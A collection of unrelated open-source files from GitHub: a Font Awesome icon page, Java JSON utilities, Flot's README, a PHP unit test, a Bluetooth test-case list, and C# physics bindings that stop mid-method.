<!--[if (gte IE 9)|!(IE)]><!-->
<html lang="en" xmlns="http://www.w3.org/1999/html"> <!--<![endif]-->
<head>
<!-- Basic Page Needs
================================================== -->
<meta charset="utf-8" />
<title>icon-minus-sign-alt: Font Awesome Icons</title>
<meta name="description" content="Font Awesome, the iconic font designed for Bootstrap">
<meta name="author" content="Dave Gandy">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<!--<meta name="viewport" content="initial-scale=1; maximum-scale=1">-->
<!--[if lt IE 9]>
<script src="http://html5shim.googlecode.com/svn/trunk/html5.js"></script>
<![endif]-->
<!-- CSS
================================================== -->
<link rel="stylesheet" href="../../assets/css/site.css">
<link rel="stylesheet" href="../../assets/css/pygments.css">
<link rel="stylesheet" href="../../assets/font-awesome/css/font-awesome.css">
<!--[if IE 7]>
<link rel="stylesheet" href="../../assets/font-awesome/css/font-awesome-ie7.css">
<![endif]-->
<!-- Le fav and touch icons -->
<link rel="shortcut icon" href="../../assets/ico/favicon.ico">
<script type="text/javascript" src="//use.typekit.net/wnc7ioh.js"></script>
<script type="text/javascript">try{Typekit.load();}catch(e){}</script>
<script type="text/javascript">
var _gaq = _gaq || [];
_gaq.push(['_setAccount', 'UA-30136587-1']);
_gaq.push(['_trackPageview']);
(function() {
var ga = document.createElement('script'); ga.type = 'text/javascript'; ga.async = true;
ga.src = ('https:' == document.location.protocol ? 'https://ssl' : 'http://www') + '.google-analytics.com/ga.js';
var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(ga, s);
})();
</script>
</head>
<body data-spy="scroll" data-target=".navbar">
<div class="wrapper"> <!-- necessary for sticky footer. wrap all content except footer -->
<div class="navbar navbar-inverse navbar-static-top hidden-print">
<div class="navbar-inner">
<div class="container">
<a class="btn btn-navbar" data-toggle="collapse" data-target=".nav-collapse">
<span class="icon-bar"></span>
<span class="icon-bar"></span>
<span class="icon-bar"></span>
</a>
<a class="brand" href="../../"><i class="icon-flag"></i> Font Awesome</a>
<div class="nav-collapse collapse">
<ul class="nav">
<li class="hidden-tablet "><a href="../../">Home</a></li>
<li><a href="../../get-started/">Get Started</a></li>
<li class="dropdown-split-left"><a href="../../icons/">Icons</a></li>
<li class="dropdown dropdown-split-right hidden-phone">
<a href="#" class="dropdown-toggle" data-toggle="dropdown">
<i class="icon-caret-down"></i>
</a>
<ul class="dropdown-menu pull-right">
<li><a href="../../icons/"><i class="icon-flag icon-fixed-width"></i> Icons</a></li>
<li class="divider"></li>
<li><a href="../../icons/#new"><i class="icon-shield icon-fixed-width"></i> New Icons in 3.2.1</a></li>
<li><a href="../../icons/#web-application"><i class="icon-camera-retro icon-fixed-width"></i> Web Application Icons</a></li>
<li><a href="../../icons/#currency"><i class="icon-won icon-fixed-width"></i> Currency Icons</a></li>
<li><a href="../../icons/#text-editor"><i class="icon-file-text-alt icon-fixed-width"></i> Text Editor Icons</a></li>
<li><a href="../../icons/#directional"><i class="icon-hand-right icon-fixed-width"></i> Directional Icons</a></li>
<li><a href="../../icons/#video-player"><i class="icon-play-sign icon-fixed-width"></i> Video Player Icons</a></li>
<li><a href="../../icons/#brand"><i class="icon-github icon-fixed-width"></i> Brand Icons</a></li>
<li><a href="../../icons/#medical"><i class="icon-medkit icon-fixed-width"></i> Medical Icons</a></li>
</ul>
</li>
<li class="dropdown-split-left"><a href="../../examples/">Examples</a></li>
<li class="dropdown dropdown-split-right hidden-phone">
<a href="#" class="dropdown-toggle" data-toggle="dropdown">
<i class="icon-caret-down"></i>
</a>
<ul class="dropdown-menu pull-right">
<li><a href="../../examples/">Examples</a></li>
<li class="divider"></li>
<li><a href="../../examples/#new-styles">New Styles</a></li>
<li><a href="../../examples/#inline-icons">Inline Icons</a></li>
<li><a href="../../examples/#larger-icons">Larger Icons</a></li>
<li><a href="../../examples/#bordered-pulled">Bordered & Pulled</a></li>
<li><a href="../../examples/#buttons">Buttons</a></li>
<li><a href="../../examples/#button-groups">Button Groups</a></li>
<li><a href="../../examples/#button-dropdowns">Button Dropdowns</a></li>
<li><a href="../../examples/#bulleted-lists">Bulleted Lists</a></li>
<li><a href="../../examples/#navigation">Navigation</a></li>
<li><a href="../../examples/#form-inputs">Form Inputs</a></li>
<li><a href="../../examples/#animated-spinner">Animated Spinner</a></li>
<li><a href="../../examples/#rotated-flipped">Rotated & Flipped</a></li>
<li><a href="../../examples/#stacked">Stacked</a></li>
<li><a href="../../examples/#custom">Custom CSS</a></li>
</ul>
</li>
<li><a href="../../whats-new/">
<span class="hidden-tablet">What's </span>New</a>
</li>
<li><a href="../../community/">Community</a></li>
<li><a href="../../license/">License</a></li>
</ul>
<ul class="nav pull-right">
<li><a href="http://blog.fontawesome.io">Blog</a></li>
</ul>
</div>
</div>
</div>
</div>
<div class="jumbotron jumbotron-icon">
<div class="container">
<div class="info-icons">
<i class="icon-minus-sign-alt icon-6"></i>
<span class="hidden-phone">
<i class="icon-minus-sign-alt icon-5"></i>
<span class="hidden-tablet"><i class="icon-minus-sign-alt icon-4"></i> </span>
<i class="icon-minus-sign-alt icon-3"></i>
<i class="icon-minus-sign-alt icon-2"></i>
</span>
<i class="icon-minus-sign-alt icon-1"></i>
</div>
<h1 class="info-class">
icon-minus-sign-alt
<small>
<i class="icon-minus-sign-alt"></i> ·
Unicode: <span class="upper">f146</span> ·
Created: v3.1 ·
Categories:
Web Application Icons
</small>
</h1>
</div>
</div>
<div class="container">
<section>
<div class="row-fluid">
<div class="span9">
<p>After you get <a href="../../integration/">up and running</a>, you can place Font Awesome icons just about anywhere with the <code><i></code> tag:</p>
<div class="well well-transparent">
<div style="font-size: 24px; line-height: 1.5em;">
<i class="icon-minus-sign-alt"></i> icon-minus-sign-alt
</div>
</div>
<div class="highlight"><pre><code class="html"><span class="nt"><i</span> <span class="na">class=</span><span class="s">"icon-minus-sign-alt"</span><span class="nt">></i></span> icon-minus-sign-alt
</code></pre></div>
<br>
<div class="lead"><i class="icon-info-sign"></i> Looking for more? Check out the <a href="../../examples/">examples</a>.</div>
</div>
<div class="span3">
<div class="info-ad"><div id="carbonads-container"><div class="carbonad"><div id="azcarbon"></div><script type="text/javascript">var z = document.createElement("script"); z.type = "text/javascript"; z.async = true; z.src = "http://engine.carbonads.com/z/32291/azcarbon_2_1_0_VERT"; var s = document.getElementsByTagName("script")[0]; s.parentNode.insertBefore(z, s);</script></div></div>
</div>
</div>
</div>
</section>
</div>
<div class="push"><!-- necessary for sticky footer --></div>
</div>
<footer class="footer hidden-print">
<div class="container text-center">
<div>
<i class="icon-flag"></i> Font Awesome 3.2.1
<span class="hidden-phone">·</span><br class="visible-phone">
Created and Maintained by <a href="http://twitter.com/davegandy">Dave Gandy</a>
</div>
<div>
Font Awesome licensed under <a href="http://scripts.sil.org/OFL">SIL OFL 1.1</a>
<span class="hidden-phone">·</span><br class="visible-phone">
Code licensed under <a href="http://opensource.org/licenses/mit-license.html">MIT License</a>
<span class="hidden-phone hidden-tablet">·</span><br class="visible-phone visible-tablet">
Documentation licensed under <a href="http://creativecommons.org/licenses/by/3.0/">CC BY 3.0</a>
</div>
<div>
Thanks to <a href="http://maxcdn.com"><i class="icon-maxcdn"></i> MaxCDN</a> for providing the excellent <a href="http://www.bootstrapcdn.com/#tab_fontawesome">BootstrapCDN for Font Awesome</a>
</div>
<div class="project">
<a href="https://github.com/FortAwesome/Font-Awesome">GitHub Project</a> ·
<a href="https://github.com/FortAwesome/Font-Awesome/issues">Issues</a>
</div>
</div>
</footer>
<script src="http://platform.twitter.com/widgets.js"></script>
<script src="../../assets/js/jquery-1.7.1.min.js"></script>
<script src="../../assets/js/ZeroClipboard-1.1.7.min.js"></script>
<script src="../../assets/js/bootstrap-2.3.1.min.js"></script>
<script src="../../assets/js/site.js"></script>
</body>
</html>
| {
"pile_set_name": "Github"
} |
package cms.utils;
import java.io.IOException;
import java.text.SimpleDateFormat;
import org.apache.logging.log4j.LogManager;
import org.apache.logging.log4j.Logger;
import com.fasterxml.jackson.core.JsonGenerator;
import com.fasterxml.jackson.core.JsonProcessingException;
import com.fasterxml.jackson.core.type.TypeReference;
import com.fasterxml.jackson.databind.DeserializationFeature;
import com.fasterxml.jackson.databind.JsonSerializer;
import com.fasterxml.jackson.databind.ObjectMapper;
import com.fasterxml.jackson.databind.SerializerProvider;
import com.fasterxml.jackson.databind.module.SimpleModule;
import com.fasterxml.jackson.databind.ser.std.ToStringSerializer;
/**
import org.codehaus.jackson.map.DeserializationConfig.Feature;
import org.codehaus.jackson.map.ObjectMapper;
import org.codehaus.jackson.map.ser.StdSerializerProvider;
import org.codehaus.jackson.type.TypeReference;
**/
/**
 * Jackson extension wrapper utilities
*
*/
public class JsonUtils {
private static final Logger logger = LogManager.getLogger(JsonUtils.class);
final static ObjectMapper objectMapper;
static {
objectMapper = new ObjectMapper();
		//serialize null values as ""
//objectMapper.getSerializerProvider().setNullValueSerializer(new NullSerializer());
objectMapper.setDateFormat(new SimpleDateFormat("yyyy-MM-dd HH:mm:ss"));
		//when converting JSON to a POJO, an unknown field in the JSON would by default throw an exception and fail the conversion; this setting prevents that
objectMapper.configure(DeserializationFeature.FAIL_ON_UNKNOWN_PROPERTIES, false);
		//when serializing to JSON, convert all longs to strings, because the JavaScript number type cannot represent every Java long value
SimpleModule simpleModule = new SimpleModule();
simpleModule.addSerializer(Long.class, ToStringSerializer.instance);
simpleModule.addSerializer(Long.TYPE, ToStringSerializer.instance);
objectMapper.registerModule(simpleModule);
// jackson2HttpMessageConverter.setObjectMapper(objectMapper);
// converters.add(jackson2HttpMessageConverter);
}
public static ObjectMapper getObjectMapper() {
return objectMapper;
}
	//JSON serializer for null values
private static class NullSerializer extends JsonSerializer<Object> {
public void serialize(Object value, JsonGenerator jgen,
SerializerProvider provider) throws IOException,
JsonProcessingException {
jgen.writeString("");
}
}
/**
	 * Convert a JSON string to a Java generic object of any type; this is the most powerful method. See the test cases for usage.
	 * @param <T>
	 * @param jsonString the JSON string
	 * @param tr TypeReference, e.g.: new TypeReference< List<FamousUser> >(){}
	 * @return the resulting object, e.g. a List
*/
public static <T> T toGenericObject(String jsonString, TypeReference<T> tr) {
if (jsonString == null || "".equals(jsonString)) {
return null;
} else {
try {
return objectMapper.readValue(jsonString, tr);
} catch (Exception e) {
// e.printStackTrace();
if (logger.isErrorEnabled()) {
logger.error("JSON串转换为Java泛型对象",e);
}
}
}
return null;
}
/**
	 * Convert a Java object to a JSON string.
	 * The string produced by this method is compatible with all browsers.
	 * @param object the Java object; can be an object, an array, a List, a Map, etc.
	 * @return the JSON string
*/
public static String toJSONString(Object object) {
String jsonString = "";
try {
jsonString = objectMapper.writeValueAsString(object);
} catch (Exception e) {
//e.printStackTrace();
if (logger.isErrorEnabled()) {
logger.error("Java对象转Json字符串",e);
}
}
return jsonString;
}
/**
	 * Convert a JSON string to a Java object
* @param jsonString
* @param c
* @return
*/
public static <T> T toObject(String jsonString, Class<?> c) {
if (jsonString == null || "".equals(jsonString)) {
return (T) "";
} else {
try {
return (T)objectMapper.readValue(jsonString, c);
} catch (Exception e) {
if (logger.isErrorEnabled()) {
logger.error("Json字符串转Java对象",e);
}
}
}
return (T) "";
}
}
| {
"pile_set_name": "Github"
} |
+++
title = "Category:Matplotlib"
description = ""
date = 2018-03-10T17:39:33Z
aliases = []
[extra]
id = 2527
[taxonomies]
categories = []
tags = []
+++
{{library}}
'''Matplotlib''' is a plotting library for the [[Python]] programming language
and its numerical mathematics extension [[NumPy]].
It can do 3D-plots, but the focus is on 2D-plotting.
Website: http://matplotlib.org/
There is a procedural "pylab" interface based on a state machine
(like [[OpenGL]]), designed to closely resemble that of [[MATLAB]],
see [http://matplotlib.org/api/pyplot_summary.html Plotting commands summary]
and [http://matplotlib.org/faq/usage_faq.html#matplotlib-pyplot-and-pylab-how-are-they-related pyplot-and-pylab].
[[:Category:SciPy|SciPy]] makes use of matplotlib.
;See also: [[Gnuplot]]
[[Category:SciPy]]
[[Category:Python]]
| {
"pile_set_name": "Github"
} |
<?xml version="1.0" encoding="utf-8"?>
<string xmlns="http://tempuri.org/">{
"Info": [
{
"IsSuccess": "True",
"InAddress": "高雄市旗山區中正路197號",
"InSRS": "EPSG:4326",
"InFuzzyType": "[單雙號機制]+[最近門牌號機制]",
"InFuzzyBuffer": "0",
"InIsOnlyFullMatch": "False",
"InIsLockCounty": "True",
"InIsLockTown": "False",
"InIsLockVillage": "False",
"InIsLockRoadSection": "False",
"InIsLockLane": "False",
"InIsLockAlley": "False",
"InIsLockArea": "False",
"InIsSameNumber_SubNumber": "True",
"InCanIgnoreVillage": "True",
"InCanIgnoreNeighborhood": "True",
"InReturnMaxCount": "0",
"OutTotal": "1",
"OutMatchType": "完全比對",
"OutMatchCode": "[高雄市]\tFULL:1",
"OutTraceInfo": "[高雄市]\t { 完全比對 } 找到符合的門牌地址"
}
],
"AddressList": [
{
"FULL_ADDR": "高雄市旗山區湄洲里22鄰中正路197號",
"COUNTY": "高雄市",
"TOWN": "旗山區",
"VILLAGE": "湄洲里",
"NEIGHBORHOOD": "22鄰",
"ROAD": "中正路",
"SECTION": "",
"LANE": "",
"ALLEY": "",
"SUB_ALLEY": "",
"TONG": "",
"NUMBER": "197號",
"X": 120.479888,
"Y": 22.889792
}
]
}</string> | {
"pile_set_name": "Github"
} |
{
"ver": "1.0.1",
"uuid": "e26ed980-1f6d-4dbc-9d68-e389367d3e4b",
"isSubpackage": false,
"subpackageName": "",
"subMetas": {}
} | {
"pile_set_name": "Github"
} |
namespace System
{
internal struct ParamsArray
{
        // Sentinel fixed-length arrays eliminate the need for a "count" field, keeping this
// struct down to just 4 fields. These are only used for their "Length" property,
// that is, their elements are never set or referenced.
private static readonly object[] oneArgArray = new object[1];
private static readonly object[] twoArgArray = new object[2];
private static readonly object[] threeArgArray = new object[3];
private readonly object arg0;
private readonly object arg1;
private readonly object arg2;
// After construction, the first three elements of this array will never be accessed
// because the indexer will retrieve those values from arg0, arg1, and arg2.
private readonly object[] args;
public ParamsArray(object arg0)
{
this.arg0 = arg0;
this.arg1 = null;
this.arg2 = null;
// Always assign this.args to make use of its "Length" property
this.args = oneArgArray;
}
public ParamsArray(object arg0, object arg1)
{
this.arg0 = arg0;
this.arg1 = arg1;
this.arg2 = null;
// Always assign this.args to make use of its "Length" property
this.args = twoArgArray;
}
public ParamsArray(object arg0, object arg1, object arg2)
{
this.arg0 = arg0;
this.arg1 = arg1;
this.arg2 = arg2;
// Always assign this.args to make use of its "Length" property
this.args = threeArgArray;
}
public ParamsArray(object[] args)
{
int len = args.Length;
this.arg0 = len > 0 ? args[0] : null;
this.arg1 = len > 1 ? args[1] : null;
this.arg2 = len > 2 ? args[2] : null;
this.args = args;
}
public int Length
{
get { return this.args.Length; }
}
public object this[int index]
{
get { return index == 0 ? this.arg0 : GetAtSlow(index); }
}
private object GetAtSlow(int index)
{
if (index == 1)
return this.arg1;
if (index == 2)
return this.arg2;
return this.args[index];
}
}
}
| {
"pile_set_name": "Github"
} |
# Flot [](https://travis-ci.org/flot/flot)
## About ##
Flot is a Javascript plotting library for jQuery.
Read more at the website: <http://www.flotcharts.org/>
Take a look at the examples in examples/index.html; they should give a good
impression of what Flot can do, and the source code of the examples is probably
the fastest way to learn how to use Flot.
## Installation ##
Just include the Javascript file after you've included jQuery.
Generally, all browsers that support the HTML5 canvas tag are
supported.
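For example, assuming the bundled file names, the include order looks like this:
```html
<script src="jquery.min.js"></script>
<script src="jquery.flot.js"></script>
```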
For support for Internet Explorer < 9, you can use [Excanvas]
[excanvas], a canvas emulator; this is used in the examples bundled
with Flot. You just include the excanvas script like this:
```html
<!--[if lte IE 8]><script language="javascript" type="text/javascript" src="excanvas.min.js"></script><![endif]-->
```
If it's not working on your development IE 6.0, check that it has
support for VML which Excanvas is relying on. It appears that some
stripped down versions used for test environments on virtual machines
lack the VML support.
You can also try using [Flashcanvas][flashcanvas], which uses Flash to
do the emulation. Although Flash can be a bit slower to load than VML,
if you've got a lot of points, the Flash version can be much faster
overall. Flot contains some wrapper code for activating Excanvas which
Flashcanvas is compatible with.
You need at least jQuery 1.2.6, but try at least 1.3.2 for interactive
charts because of performance improvements in event handling.
## Basic usage ##
Create a placeholder div to put the graph in:
```html
<div id="placeholder"></div>
```
You need to set the width and height of this div, otherwise the plot
library doesn't know how to scale the graph. You can do it inline like
this:
```html
<div id="placeholder" style="width:600px;height:300px"></div>
```
You can also do it with an external stylesheet. Make sure that the
placeholder isn't within something with a display:none CSS property -
in that case, Flot has trouble measuring label dimensions which
results in garbled looks and might have trouble measuring the
placeholder dimensions which is fatal (it'll throw an exception).
Then when the div is ready in the DOM, which is usually on document
ready, run the plot function:
```js
$.plot($("#placeholder"), data, options);
```
Here, data is an array of data series and options is an object with
settings if you want to customize the plot. Take a look at the
examples for some ideas of what to put in or look at the
[API reference](API.md). Here's a quick example that'll draw a line
from (0, 0) to (1, 1):
```js
$.plot($("#placeholder"), [ [[0, 0], [1, 1]] ], { yaxis: { max: 1 } });
```
The plot function immediately draws the chart and then returns a plot
object with a couple of methods.
## What's with the name? ##
First: it's pronounced with a short o, like "plot". Not like "flawed".
So "Flot" rhymes with "plot".
And if you look up "flot" in a Danish-to-English dictionary, some of
the words that come up are "good-looking", "attractive", "stylish",
"smart", "impressive", "extravagant". One of the main goals with Flot
is pretty looks.
## Notes about the examples ##
In order to have a useful, functional example of time-series plots using time
zones, date.js from [timezone-js][timezone-js] (released under the Apache 2.0
license) and the [Olson][olson] time zone database (released to the public
domain) have been included in the examples directory. They are used in
examples/axes-time-zones/index.html.
[excanvas]: http://code.google.com/p/explorercanvas/
[flashcanvas]: http://code.google.com/p/flashcanvas/
[timezone-js]: https://github.com/mde/timezone-js
[olson]: http://ftp.iana.org/time-zones
| {
"pile_set_name": "Github"
} |
<?xml version="1.0" encoding="utf-8"?>
<style xmlns="http://purl.org/net/xbiblio/csl" version="1.0" default-locale="en-US">
<!-- Generated with https://github.com/citation-style-language/utilities/tree/master/generate_dependent_styles/data/taylor-and-francis -->
<info>
<title>Asian Anthropology</title>
<id>http://www.zotero.org/styles/asian-anthropology</id>
<link href="http://www.zotero.org/styles/asian-anthropology" rel="self"/>
<link href="http://www.zotero.org/styles/taylor-and-francis-chicago-author-date" rel="independent-parent"/>
<link href="http://www.tandfonline.com/action/authorSubmission?journalCode=RAAN20&page=instructions" rel="documentation"/>
<category citation-format="author-date"/>
<category field="humanities"/>
<issn>1683-478X</issn>
<eissn>2168-4227</eissn>
<updated>2014-05-17T12:00:00+00:00</updated>
<rights license="http://creativecommons.org/licenses/by-sa/3.0/">This work is licensed under a Creative Commons Attribution-ShareAlike 3.0 License</rights>
</info>
</style>
| {
"pile_set_name": "Github"
} |
<?php
namespace Oro\Bundle\EmailBundle\Tests\Unit\Provider;
use Oro\Bundle\EmailBundle\Model\Recipient;
use Oro\Bundle\EmailBundle\Provider\EmailRecipientsProvider;
class EmailRecipientsProviderTest extends \PHPUnit\Framework\TestCase
{
/** @var \PHPUnit\Framework\MockObject\MockObject */
protected $emailRecipientsHelper;
/** @var EmailRecipientsProvider */
protected $emailRecipientsProvider;
protected function setUp(): void
{
$translator = $this->createMock('Symfony\Contracts\Translation\TranslatorInterface');
$translator->expects($this->any())
->method('trans')
->will($this->returnCallback(function ($id) {
return $id;
}));
$this->emailRecipientsHelper = $this->getMockBuilder('Oro\Bundle\EmailBundle\Provider\EmailRecipientsHelper')
->disableOriginalConstructor()
->getMock();
$this->emailRecipientsHelper->expects($this->any())
->method('createRecipientData')
->will($this->returnCallback(function (Recipient $recipient) {
return [
'id' => $recipient->getName(),
'text' => $recipient->getName(),
];
}));
$this->emailRecipientsProvider = new EmailRecipientsProvider($translator, $this->emailRecipientsHelper);
}
public function testGetEmailRecipientsShouldReturnEmptyArrayIfThereAreNoProviders()
{
$this->assertEmpty($this->emailRecipientsProvider->getEmailRecipients());
}
/**
* @dataProvider dataProvider
*/
public function testGetEmailRecipients(array $providers, array $expectedRecipients, $limit = 100)
{
$this->emailRecipientsProvider->setProviders($providers);
$actualRecipients = $this->emailRecipientsProvider->getEmailRecipients(null, null, null, $limit);
$this->assertEquals($expectedRecipients, $actualRecipients);
}
public function dataProvider()
{
return [
[
[
$this->createProvider('section1', [
new Recipient('[email protected]', 'Recipient <[email protected]>'),
new Recipient('[email protected]', 'Recipient2 <[email protected]>'),
]),
],
[
[
'text' => 'section1',
'children' => [
[
'id' => 'Recipient <[email protected]>',
'text' => 'Recipient <[email protected]>',
],
[
'id' => 'Recipient2 <[email protected]>',
'text' => 'Recipient2 <[email protected]>',
],
],
]
],
],
[
[
$this->createProvider('section1', [
new Recipient('[email protected]', 'Recipient <[email protected]>'),
new Recipient('[email protected]', 'Recipient2 <[email protected]>'),
]),
$this->createProvider('section2', [
new Recipient('[email protected]', 'Recipient3 <[email protected]>'),
]),
],
[
[
'text' => 'section1',
'children' => [
[
'id' => 'Recipient <[email protected]>',
'text' => 'Recipient <[email protected]>',
],
[
'id' => 'Recipient2 <[email protected]>',
'text' => 'Recipient2 <[email protected]>',
],
],
],
[
'text' => 'section2',
'children' => [
[
'id' => 'Recipient3 <[email protected]>',
'text' => 'Recipient3 <[email protected]>',
],
],
],
],
],
[
[
$this->createProvider('section1', [
new Recipient('[email protected]', 'Recipient <[email protected]>'),
new Recipient('[email protected]', 'Recipient2 <[email protected]>'),
]),
$this->createProvider('section2', [
new Recipient('[email protected]', 'Recipient3 <[email protected]>'),
], 0),
],
[
[
'text' => 'section1',
'children' => [
[
'id' => 'Recipient <[email protected]>',
'text' => 'Recipient <[email protected]>',
],
[
'id' => 'Recipient2 <[email protected]>',
'text' => 'Recipient2 <[email protected]>',
],
],
],
],
2,
],
];
}
/**
* @param string $section
* @param array $provided
* @param int $recipientExactly
*
* @return \PHPUnit\Framework\MockObject\MockObject
*/
protected function createProvider($section, array $provided, $recipientExactly = 1)
{
$provider = $this->createMock('Oro\Bundle\EmailBundle\Provider\EmailRecipientsProviderInterface');
$provider->expects($this->any())
->method('getSection')
->will($this->returnValue($section));
$provider->expects($this->exactly($recipientExactly))
->method('getRecipients')
->will($this->returnValue($provided));
return $provider;
}
}
| {
"pile_set_name": "Github"
} |
// Copyright (c) 2007, Clarius Consulting, Manas Technology Solutions, InSTEDD, and Contributors.
// All rights reserved. Licensed under the BSD 3-Clause License; see License.txt.
namespace Moq.Tests.FSharpTypes
open System;
type HasProperty() =
let mutable property = new obj()
abstract Property: obj with get, set
default this.Property with get() = property and set(value: obj) = property <- value
| {
"pile_set_name": "Github"
} |
# Copyright 2019 Oticon A/S
# SPDX-License-Identifier: Apache-2.0
GAP/GAT/BV-01-C
GAP/GAT/BV-02-C
GAP/GAT/BV-03-C
GAP/GAT/BV-04-C
GAP/GAT/BV-05-C
GAP/IDLE/NAMP/BV-01-C
GAP/GAT/BX-01-C
GATT/SR/GAC/BV-01-C
GATT/SR/GAD/BV-01-C
GATT/SR/GAD/BV-02-C
GATT/SR/GAD/BV-03-C
GATT/SR/GAD/BV-04-C
GATT/SR/GAD/BV-05-C
GATT/SR/GAD/BV-06-C
GATT/SR/GAR/BV-01-C
GATT/SR/GAR/BI-01-C
GATT/SR/GAR/BI-02-C
GATT/SR/GAR/BI-03-C
GATT/SR/GAR/BI-04-C
GATT/SR/GAR/BV-03-C
GATT/SR/GAR/BI-06-C
GATT/SR/GAR/BI-07-C
GATT/SR/GAR/BI-09-C
GATT/SR/GAR/BI-10-C
GATT/SR/GAR/BI-11-C
GATT/SR/GAR/BV-04-C
GATT/SR/GAR/BI-12-C
GATT/SR/GAR/BI-13-C
GATT/SR/GAR/BI-14-C
GATT/SR/GAR/BI-15-C
GATT/SR/GAR/BI-16-C
GATT/SR/GAR/BI-17-C
GATT/SR/GAR/BV-05-C
GATT/SR/GAR/BI-18-C
GATT/SR/GAR/BI-19-C
GATT/SR/GAR/BI-20-C
GATT/SR/GAR/BI-21-C
GATT/SR/GAR/BI-22-C
GATT/SR/GAR/BV-06-C
GATT/SR/GAR/BV-07-C
GATT/SR/GAW/BV-01-C
GATT/SR/GAW/BV-03-C
GATT/SR/GAW/BI-02-C
GATT/SR/GAW/BI-03-C
GATT/SR/GAW/BI-04-C
GATT/SR/GAW/BI-05-C
GATT/SR/GAW/BI-06-C
GATT/SR/GAW/BV-05-C
GATT/SR/GAW/BI-07-C
GATT/SR/GAW/BI-08-C
GATT/SR/GAW/BI-09-C
GATT/SR/GAW/BI-11-C
GATT/SR/GAW/BI-12-C
GATT/SR/GAW/BI-13-C
GATT/SR/GAW/BV-08-C
GATT/SR/GAW/BV-09-C
GATT/SR/GAW/BV-11-C
GATT/SR/GAW/BI-32-C
GATT/SR/GAW/BI-33-C
GATT/SR/GAN/BV-01-C
GATT/SR/GAI/BV-01-C
GATT/SR/GAS/BV-01-C
GATT/SR/UNS/BI-01-C
GATT/SR/UNS/BI-02-C
GATT/SR/GPA/BV-01-C
GATT/SR/GPA/BV-02-C
GATT/SR/GPA/BV-03-C
GATT/SR/GPA/BV-04-C
GATT/SR/GPA/BV-05-C
GATT/SR/GPA/BV-06-C
GATT/SR/GPA/BV-07-C
GATT/SR/GPA/BV-08-C
GATT/SR/GPA/BV-12-C
| {
"pile_set_name": "Github"
} |
using System;
using BulletSharp.Math;
using static BulletSharp.UnsafeNativeMethods;
namespace BulletSharp
{
public class UsageBitfield
{
internal IntPtr Native;
internal UsageBitfield(IntPtr native)
{
Native = native;
}
public void Reset()
{
btUsageBitfield_reset(Native);
}
public bool Unused1
{
get => btUsageBitfield_getUnused1(Native);
set => btUsageBitfield_setUnused1(Native, value);
}
public bool Unused2
{
get => btUsageBitfield_getUnused2(Native);
set => btUsageBitfield_setUnused2(Native, value);
}
public bool Unused3
{
get => btUsageBitfield_getUnused3(Native);
set => btUsageBitfield_setUnused3(Native, value);
}
public bool Unused4
{
get => btUsageBitfield_getUnused4(Native);
set => btUsageBitfield_setUnused4(Native, value);
}
public bool UsedVertexA
{
get => btUsageBitfield_getUsedVertexA(Native);
set => btUsageBitfield_setUsedVertexA(Native, value);
}
public bool UsedVertexB
{
get => btUsageBitfield_getUsedVertexB(Native);
set => btUsageBitfield_setUsedVertexB(Native, value);
}
public bool UsedVertexC
{
get => btUsageBitfield_getUsedVertexC(Native);
set => btUsageBitfield_setUsedVertexC(Native, value);
}
public bool UsedVertexD
{
get => btUsageBitfield_getUsedVertexD(Native);
set => btUsageBitfield_setUsedVertexD(Native, value);
}
}
public class SubSimplexClosestResult : IDisposable
{
internal IntPtr Native;
internal SubSimplexClosestResult(IntPtr native)
{
Native = native;
}
public SubSimplexClosestResult()
{
Native = btSubSimplexClosestResult_new();
}
public void Reset()
{
btSubSimplexClosestResult_reset(Native);
}
public void SetBarycentricCoordinates()
{
btSubSimplexClosestResult_setBarycentricCoordinates(Native);
}
public void SetBarycentricCoordinates(double a)
{
btSubSimplexClosestResult_setBarycentricCoordinates2(Native, a);
}
public void SetBarycentricCoordinates(double a, double b)
{
btSubSimplexClosestResult_setBarycentricCoordinates3(Native, a, b);
}
public void SetBarycentricCoordinates(double a, double b, double c)
{
btSubSimplexClosestResult_setBarycentricCoordinates4(Native, a, b, c);
}
public void SetBarycentricCoordinates(double a, double b, double c, double d)
{
btSubSimplexClosestResult_setBarycentricCoordinates5(Native, a, b, c,
d);
}
/*
public doubleArray BarycentricCoords
{
get { return btSubSimplexClosestResult_getBarycentricCoords(Native); }
}
*/
public Vector3 ClosestPointOnSimplex
{
get
{
Vector3 value;
btSubSimplexClosestResult_getClosestPointOnSimplex(Native, out value);
return value;
}
set => btSubSimplexClosestResult_setClosestPointOnSimplex(Native, ref value);
}
public bool Degenerate
{
get => btSubSimplexClosestResult_getDegenerate(Native);
set => btSubSimplexClosestResult_setDegenerate(Native, value);
}
public bool IsValid => btSubSimplexClosestResult_isValid(Native);
public UsageBitfield UsedVertices
{
get => new UsageBitfield(btSubSimplexClosestResult_getUsedVertices(Native));
set => btSubSimplexClosestResult_setUsedVertices(Native, value.Native);
}
public void Dispose()
{
Dispose(true);
GC.SuppressFinalize(this);
}
protected virtual void Dispose(bool disposing)
{
if (Native != IntPtr.Zero)
{
btSubSimplexClosestResult_delete(Native);
Native = IntPtr.Zero;
}
}
~SubSimplexClosestResult()
{
Dispose(false);
}
}
public class VoronoiSimplexSolver : IDisposable
{
internal IntPtr Native;
private bool _preventDelete;
internal VoronoiSimplexSolver(IntPtr native, bool preventDelete)
{
Native = native;
_preventDelete = preventDelete;
}
public VoronoiSimplexSolver()
{
Native = btVoronoiSimplexSolver_new();
}
public void AddVertexRef(ref Vector3 w, ref Vector3 p, ref Vector3 q)
{
btVoronoiSimplexSolver_addVertex(Native, ref w, ref p, ref q);
}
public void AddVertex(Vector3 w, Vector3 p, Vector3 q)
{
btVoronoiSimplexSolver_addVertex(Native, ref w, ref p, ref q);
}
public void BackupClosest(out Vector3 v)
{
btVoronoiSimplexSolver_backup_closest(Native, out v);
}
public bool Closest(out Vector3 v)
{
return btVoronoiSimplexSolver_closest(Native, out v);
}
public bool ClosestPtPointTetrahedronRef(ref Vector3 p, ref Vector3 a, ref Vector3 b, ref Vector3 c,
ref Vector3 d, SubSimplexClosestResult finalResult)
{
return btVoronoiSimplexSolver_closestPtPointTetrahedron(Native, ref p,
ref a, ref b, ref c, ref d, finalResult.Native);
}
public bool ClosestPtPointTetrahedron(Vector3 p, Vector3 a, Vector3 b, Vector3 c,
Vector3 d, SubSimplexClosestResult finalResult)
{
return btVoronoiSimplexSolver_closestPtPointTetrahedron(Native, ref p,
ref a, ref b, ref c, ref d, finalResult.Native);
}
public bool ClosestPtPointTriangleRef(ref Vector3 p, ref Vector3 a, ref Vector3 b, ref Vector3 c,
SubSimplexClosestResult result)
{
